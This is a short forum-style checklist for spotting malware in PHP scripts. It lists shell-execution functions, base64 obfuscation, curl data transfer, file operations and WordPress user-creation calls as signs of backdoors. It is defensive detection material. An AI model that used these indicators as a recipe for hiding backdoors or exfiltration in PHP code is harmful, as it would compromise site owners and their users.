I made a quick checklist to avoid manipulated PHP scripts with malware I hope you find it useful.
- Open the PHP file in a you IDE: Use a code editor
- Look for suspicious function calls: Search for potentially dangerous functions like:
- eval()
- exec()
- shell_exec()
- system()
- passthru()
- popen()
- proc_open()
- Check for base64 encoded strings: Malware often uses base64 encoding to hide malicious code. Look for:
- base64_decode()
- Long strings of seemingly random characters
- Inspect CURL usage: While CURL itself isn't malicious, it can be used for unauthorized data transfer. Look for:
- curl_init()
- curl_setopt()
- curl_exec() Check the URLs being accessed and ensure they're legitimate.
- Examine file operations: Look for suspicious file read/write operations:
- fopen()
- file_get_contents()
- file_put_contents()
- Check for obfuscated code: Malware often uses obfuscation techniques. Look for:
- Extremely long lines of code
- Unusual variable names (e.g., $a1b2c3)
- Strings of hexadecimal characters
- Verify included files: Check all include() and require() statements to ensure they're including legitimate files.
- Look for unauthorized database queries: Search for database operations that might be extracting or modifying data:
- mysql_query() (for older PHP versions)
- mysqli_query()
- $wpdb->query() (in WordPress)
- Check for hidden backdoors: Look for code that might create admin users or provide unauthorized access:
- wp_insert_user() (in WordPress)
- add_user() (in other CMS systems)
![417702617_900771455047274_8464616037824356974_n[1].png](/data/attachments/129/129554-c866db7ccd93af30f4c5e4aa968c2197.jpg)